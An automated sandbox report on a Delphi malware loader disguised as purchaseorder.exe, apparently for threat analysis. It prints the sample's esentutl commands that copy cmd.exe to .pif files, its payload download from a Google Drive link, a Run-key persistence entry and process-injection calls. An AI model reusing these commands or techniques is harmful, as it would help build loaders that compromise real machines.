Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Dec. 2, 2024, 9:58 a.m.	Dec. 2, 2024, 10 a.m.

Size	1.5MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`ff74865e59dc57289613c8acf736e684`
SHA256	`8ee464a74743e4ddc61f0afb0a555e5cd5d8c286eae283e80f3cbf77f6ca88d2`
CRC32	`74A1D8AD`
ssdeep	`24576:kUFlmYzMQEOu53W2/AVTNFM9TfXx0IOnl6Q2G9RghhPHu:kKFzjboqFMRXx0IUl6Q2vh/u`
Yara	Malicious_Library_Zero - Malicious_Library ftp_command - ftp command IsPE32 - (no description) PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file mzp_file_format - MZP(Delphi) file format

purchaseorder.exe "C:\Users\test22\AppData\Local\Temp\purchaseorder.exe"
2056
- cmd.exe cmd /c ""C:\Users\Public\Libraries\kzgqdtrG.cmd" "
  2544
  - esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
    2604
  - esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
    2648
- esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\test22\AppData\Local\Temp\purchaseorder.exe /d C:\\Users\\Public\\Libraries\\Grtdqgzk.PIF /o
  2768

Name	Response	Post-Analysis Lookup
drive.usercontent.google.com	A 142.250.197.33	216.58.220.97
drive.google.com	A 142.250.197.110	142.250.207.46

IP Address	Status	Action
142.250.197.110	Active	Moloch
142.250.197.33	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49164 -> 142.250.197.33:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49163 -> 142.250.197.110:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49164 142.250.197.33:443	C=US, O=Google Trust Services, CN=WR2	CN=*.usercontent.google.com	99:cb:c1:5c:39:39:57:25:fe:5d:49:36:2b:13:16:15:8e:ef:d9:b6
TLSv1 192.168.56.103:49163 142.250.197.110:443	C=US, O=Google Trust Services, CN=WR2	CN=*.google.com	2c:88:d1:f3:88:1e:8c:7a:fa:75:31:0c:56:7a:2f:4e:7f:79:4f:eb

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 2, 2024, 9:58 a.m.			0	0

Command line console output was observed (18 events)

Time & API	Arguments	Status	Return
WriteConsoleW Dec. 2, 2024, 9:59 a.m.	buffer: '"' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 2, 2024, 9:59 a.m.	buffer: The system cannot find the path specified. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 2, 2024, 9:59 a.m.	buffer: This version of C:\Users\Public\alpha.pif is not compatible with the version of Windows you're running. Check your computer's system information to see whether console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 2, 2024, 9:59 a.m.	buffer: you need a x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 2, 2024, 9:59 a.m.	buffer: '"' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 2, 2024, 9:59 a.m.	buffer: This version of C:\Users\Public\alpha.pif is not compatible with the version of Windows you're running. Check your computer's system information to see whether console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 2, 2024, 9:59 a.m.	buffer: you need a x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 2, 2024, 9:59 a.m.	buffer: This version of C:\Users\Public\alpha.pif is not compatible with the version of Windows you're running. Check your computer's system information to see whether console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 2, 2024, 9:59 a.m.	buffer: you need a x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 2, 2024, 9:59 a.m.	buffer: Deleted file - C:\Users\Public\alpha.pif console_handle: 0x00000007	1	1
WriteConsoleA Dec. 2, 2024, 9:59 a.m.	buffer: FAILURE: GetOverlappedResult (read) returned wrong number of bytes: The operation completed successfully. console_handle: 0x0000000b	1	1
WriteConsoleA Dec. 2, 2024, 9:59 a.m.	buffer: FAILURE: GetOverlappedResult (read) returned wrong number of bytes: The operation completed successfully. console_handle: 0x0000000b	1	1
WriteConsoleA Dec. 2, 2024, 9:59 a.m.	buffer: Initiating COPY FILE mode... console_handle: 0x00000007	1	1
WriteConsoleA Dec. 2, 2024, 9:59 a.m.	buffer: Source File: C:\Users\test22\AppData\Local\Temp\purchaseorder.exe console_handle: 0x00000007	1	1
WriteConsoleA Dec. 2, 2024, 9:59 a.m.	buffer: Destination File: C:\\Users\\Public\\Libraries\\Grtdqgzk.PIF console_handle: 0x00000007	1	1
WriteConsoleA Dec. 2, 2024, 9:59 a.m.	buffer: Copy Progress (% complete) console_handle: 0x00000007	1	1
WriteConsoleA Dec. 2, 2024, 9:59 a.m.	buffer: FAILURE: GetOverlappedResult (read) returned wrong number of bytes: The operation completed successfully. console_handle: 0x0000000b	1	1
WriteConsoleA Dec. 2, 2024, 9:59 a.m.	buffer: Operation terminated unsuccessfully after 0.31 seconds. console_handle: 0x00000007	1	1

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.itext

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (2 events)

request	GET https://drive.google.com/uc?export=download&id=1XzhOpdRULZx1cctu9j9NRQy6z6bLZdx1
request	GET https://drive.usercontent.google.com/download?id=1XzhOpdRULZx1cctu9j9NRQy6z6bLZdx1&export=download

Allocates read-write-execute memory (usually to unpack itself) (50 out of 954 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1000000003 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a56bc process_handle: 0xffffffff		3221225496

Downloads a file or document from Google Drive (1 event)

domain

drive.google.com

Creates executable files on the filesystem (2 events)

file	C:\Users\Public\Libraries\kzgqdtrG.pif
file	C:\Users\Public\Libraries\kzgqdtrG.cmd

Creates a suspicious process (1 event)

cmdline

C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o

Drops a binary and executes it (1 event)

file	C:\Users\Public\alpha.pif

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 180224 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x033e1000 process_handle: 0xffffffff	1	0	0

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Dec. 2, 2024, 9:59 a.m.	process_identifier: 2828 region_size: 466853888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000005ac	1	0	0
NtAllocateVirtualMemory Dec. 2, 2024, 9:59 a.m.	process_identifier: 2828 region_size: 466851743 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000005ac		3221225496	0

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Grtdqgzk

reg_value

C:\Users\Public\Grtdqgzk.url

Deletes executed files from disk (1 event)

file

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Dec. 2, 2024, 9:58 a.m.	key_handle: 0x00000328 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Manipulates memory of a non-child process indicative of process injection (11 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2056 manipulating memory of non-child process 0
Process injection	Process 2056 manipulating memory of non-child process 2828
NtAllocateVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 0 region_size: 180000000 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x033e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000000		3221225480	0
NtAllocateVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 0 region_size: 180000000 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x0340d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000000		3221225480	0
NtAllocateVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 0 region_size: 180000000 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x0340e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000000		3221225480	0
NtAllocateVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 0 region_size: 180000000 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x03464000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000000		3221225480	0
NtAllocateVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 0 region_size: 180000000 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x0355c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000000		3221225480	0
NtAllocateVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 0 region_size: 180000000 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x0355e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000000		3221225480	0
NtUnmapViewOfSection Dec. 2, 2024, 9:59 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2828 process_handle: 0x000005ac	1	0	0
NtAllocateVirtualMemory Dec. 2, 2024, 9:59 a.m.	process_identifier: 2828 region_size: 466853888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000005ac	1	0	0
NtAllocateVirtualMemory Dec. 2, 2024, 9:59 a.m.	process_identifier: 2828 region_size: 466851743 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000005ac		3221225496	0

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2056 called NtSetContextThread to modify thread in remote process 2828
NtSetContextThread Dec. 2, 2024, 9:59 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4246831 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000384 process_identifier: 2828	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2056 resumed a thread in remote process 2828
NtResumeThread Dec. 2, 2024, 9:59 a.m.	thread_handle: 0x00000384 suspend_count: 1 process_identifier: 2828	1	0	0

Executed a process and injected code into it, probably while unpacking (23 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 0 region_size: 180000000 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x033e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000000		3221225480
NtAllocateVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 0 region_size: 180000000 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x0340d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000000		3221225480
NtAllocateVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 0 region_size: 180000000 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x0340e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000000		3221225480
NtAllocateVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 0 region_size: 180000000 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x03464000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000000		3221225480
NtAllocateVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 0 region_size: 180000000 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x0355c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000000		3221225480
NtAllocateVirtualMemory Dec. 2, 2024, 9:58 a.m.	process_identifier: 0 region_size: 180000000 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x0355e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000000		3221225480
CreateProcessInternalW Dec. 2, 2024, 9:59 a.m.	thread_identifier: 2548 thread_handle: 0x00000360 process_identifier: 2544 current_directory: C:\Users\Public\Libraries\ filepath: track: 1 command_line: "C:\Users\Public\Libraries\kzgqdtrG.cmd" filepath_r: stack_pivoted: 0 creation_flags: 48 (CREATE_NEW_CONSOLE\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000035c	1	1
CreateProcessInternalW Dec. 2, 2024, 9:59 a.m.	thread_identifier: 2772 thread_handle: 0x000005b0 process_identifier: 2768 current_directory: filepath: track: 1 command_line: C:\\Windows\\System32\\esentutl.exe /y C:\Users\test22\AppData\Local\Temp\purchaseorder.exe /d C:\\Users\\Public\\Libraries\\Grtdqgzk.PIF /o filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000005a4	1	1
